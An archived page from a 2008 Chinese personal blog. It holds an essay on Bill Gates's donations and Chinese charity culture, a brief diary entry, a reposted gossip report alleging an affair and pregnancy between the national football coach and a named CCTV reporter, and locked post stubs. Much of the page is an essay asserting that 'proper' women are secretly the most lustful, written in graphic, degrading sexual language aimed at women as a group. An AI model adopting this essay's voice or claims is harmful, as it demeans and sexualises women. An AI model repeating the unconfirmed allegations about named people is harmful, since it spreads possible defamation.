    盖茨把巨额财富看成是巨大的权利,同时也是巨大的义务。然而与盖茨的财富观相比,我们的富豪大多把财富视为追求名利、追求个人价值的手段和目的。挣钱是为了光宗耀祖,是为了出人头地,而不是为了普济众生。在这种慈善文化的影响下,我们就不难理解中国渐成奢侈品消费大国的背后隐喻。孟子说:“达则兼济天下”。遗憾的是,富豪们普遍缺失这种将巨额财富回报社会的慈善文化和心理认同。
   
    同时,我们的社会也缺乏鼓励慈善意识的制度性措施。比如在法律上为慈善捐赠大幅减税,为监管善款的透明运用保驾护航。这一方面削弱了慈善文化的社会基础,另一方面也不利于成长起来的富豪积极投身于慈善事业。因而,盖茨把全部财产捐给自己的基金会,其实也是对我们提出了一个问题,那就是如何保证善款的善用。这就需要加强慈善机构的独立性透明性,因为有公信力的基金会才能吸引更多的社会捐赠,当人们对善款的最终用途和去向都失去信任时,慈善文化的传承就失去可靠的载体。从这个意义上来说,我们需要更多的类似李连杰的壹基金能尽快成长起来,承担起传播慈善文化的社会责任。
   
    当然,西方已经迈入了成熟的福利社会,在一定程度上为富豪们解决了生活的后顾之忧,这也是慈善文化发达的一个外部原因所在。
   
    在贫富悬殊日益加大的当下,慈善捐赠或许还具有消除为富不仁的社会疑虑的社会因素。然而在盖茨捐出全部财产的事实面前,我们的富豪需要自省,我们的慈善文化更需要自省。

本文来自中华网

可怜的喉咙

这两天总是有点咳嗽,貌似烟吸多了?好像鼻子也有点不舒服…

有好一段时间没去上岛咖啡了,最近总在郁闷的写文档,赶时间吧,所以这两天又去吃卤肉饭了(实在不知道有什么别的能让我喜欢)。

楼下大厅正在准备婚礼场吧,感觉还是挺不错的,嘿嘿,俺啥时候也能有那么多钱呢?该准备回去了。

PS:昨天晚上的雨让偶睡的很舒服,只是回去的时候忘记先点蚊香了,被无情了啃了好多回,直至十二点多才睡觉-_-!!!

国足主教练与央视女记者曝丑闻


国家足球队主教练拉特米尔-杜伊科维奇(62岁,左图)与女记者卷入丑闻风波。丑闻的女主角是中国中央电视台(CCTV)的足球记者陆幽(右图)。丑闻的内容是两人“有染”,陆幽怀孕。

前中央电视台足球解说员、目前是自由人的黄健翔于6日在自己的博客中发文曝出此事。

黄健翔在文章中写道:“某位人士再次令中央电视台卷入丑闻之中。因此这位人士的国家足球队首席随队记者的身份也被撤销。”台湾《联合报》12日报道说,虽然黄健翔没有直接指名道姓,但中央电视台相关人士指出该“人士”是陆幽。

在最近进行的世界杯预选赛中,中国队没有取得1场胜利,处于被淘汰的危机之中,而此次又曝出这样的丑闻,使中国球迷对主教练杜伊科维奇大失所望。因此次丑闻,不仅是杜伊科维奇,还让北京奥运会主管电视台中央电视台丢尽颜面。

台湾《联合报》报道说,陆幽还曾是中央电视台著名体育节目主持人张斌的婚外恋对象,此前张斌曾因妻子在现场直播时曝出其有外遇而颜面尽失。该报报道说,部分网民嘲笑说,中央电视台的男女关系比电视剧还乱。目前,丑闻的当事人还没有表明立场。

Protected: 因为某些原因关闭了好几天,现在好了

This post is password protected. To view it please enter your password below:


Protected: 感冒好像又变厉害了

This post is password protected. To view it please enter your password below:


Protected: 小气今天就被披露出来

This post is password protected. To view it please enter your password below:


愈正经的女人愈淫荡

正经的女人,历朝历代总会被人们所普遍拥戴和推崇,并成为社会道德规范赋予女性学习的榜样和效仿的楷模。正经女人不仅符合男性为主导的社会伦理价值观,更是对女性情操和道德的最高褒奖。 

    自古就有“女子无才便是德”的说法,多少年来广受批评,视为垃圾,但按林言同志的理解,其真正的含义应为“女人哪怕没有才,有德行也是可以的”。看似退而求其次,实则仍为宣扬女人的品德。可见,女人的品德理较男人而言,却承受着更多的责任和更大的压力,而女人自身也更为看重社会的道德评价。比如说,你可以骂一个小姐是“妓女”,可你绝不可以说她“不正经”。为什么?前者只是职业歧视罢了,而后者却涉及人家的人格和道德底线了。这就好比你可以说她出身贫贱,可你万万不可以说她是婊子养的,等于说她是不正经的人家生的,那可就是极大的污辱和诋毁了。又比如说,以前,女人们讽刺和嘲笑那些所谓不正经的女人,常常用这样的话语挖苦道:“对呀!我是长得没你好看,我要是漂亮的话,我也跟野男人去睡了啊?!” 

    在女人的心目中,个人道德评价高过一切。举例来说,一个女子在外面做小姐,她可以毫无顾虑地告诉别人,她的职业是“小姐”。可一旦回到家乡,她只会说她在外地是打工为生的,绝对绝对不会趾高气扬地说她的职业是“小姐”。尽管有存在即合理一说,可哪怕再无耻的女人也不可能百分百完全视社会道德评价为狗屁。 

    在当下这个金钱至上,欲望纷飞的社会大环境下,再谈什么海枯石烂海誓山盟忠贞不渝忠心不二,无疑等同于观念落后思想僵化,由此人们的人生观、价值观及婚姻观、家庭观也随之发生天翻地覆的巨大变化。如今,外遇劈腿家常便饭,出轨出墙此起彼伏,情人二奶风起云涌,红颜蓝颜蓬勃发展,再奢谈什么爱情什么浪漫什么忠贞什么未来,统统成了尘烟往事了无痕迹。 

    有些东西,你无法定义它,但是你只能去接受它。当正经女人成为这个社会的稀缺品时,不知道这是社会的悲哀,还是道德的悲哀。事虽如此,林言同志却对有些正经女人的作呕做法不敢恭维,淫荡程度丝毫不输于浪女,并且在某些方面远胜过小姐们的行为。 

    从表面上看,这些正经女人绝对是一副作风严谨之人,一笑一娉,一举一动,大家风范,浑身散发出让人肃然起敬的派头,若有人随意开句什么无伤大雅的玩笑话,必抱以冷眼视之,如再听到什么黄段子荦笑话更是侧目而视,怒目圆睁。平时有人谈到什么两性话题,不是避而不谈,就是装腔作势,不是故意回避,就是装傻充楞,不是嗤之以鼻,就是忸怩作态,整个一个做作恶心混帐透顶臭气熏天的无耻之徒。而在私下里,这种正经女人则完全是另一副丑陋嘴脸——喜欢看A片或三级片,喜欢看暴露的色图片,喜欢看男欢女爱的文章,甚至去酒吧等场所猎男人来个什么一夜情一夜性。不知是长期压抑,还是装正经憋久的缘故,其欲望总是渴求不尽,一夜要几次还不过瘾,还叽矶歪歪粘粘乎乎装纯情扮淑女,说自己是除处女以后的第一次。更有过份的是,这些正经女人,刚从别的男人床上下来,屁股还来不及擦一下,就又忙不迭地爬到下一个男人的床头,蹶起个臭屁股等男人搞她,当男人说她下面有异味时,这个正经女人不是板起面孔装委屈,要么就大言不惭地说“人家是想你了嘛”,又抛媚眼,又来飞吻,哄骗俱上,双管齐下。当男人问这个正经的女人平时怎么那样凛然不可侵犯,而在床上去如狼似虎如饥似渴时,她要么会说“你们男人不是喜欢床上的荡妇么”,要么会说“我的淫荡只为你”……  

    实际证明,愈正经的女人愈淫荡。倒不是林言同志不喜欢正经的女人,而实在是因为那些正经的女人的矫情让人窒息,让人抽搐,不吐血而亡,也会流精而死。眼下再听到某个女人被人尊称为正经女人,我就不自主地大小便失禁。对林言同志而言,宁可喜欢一个真实淫荡的女人,也绝不沾正经女人的阴毛,因为表面的芳香再诱人,也难以掩盖其内在的腐臭和肮脏,其布满蛆虫的下身正以前所未有的速度绽放着恶腥味——

Page 5 of 20« First...«34567»...Last »


Pages
Calendar
« 2008 November »
M T W T F S S
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Recent Entries
Categories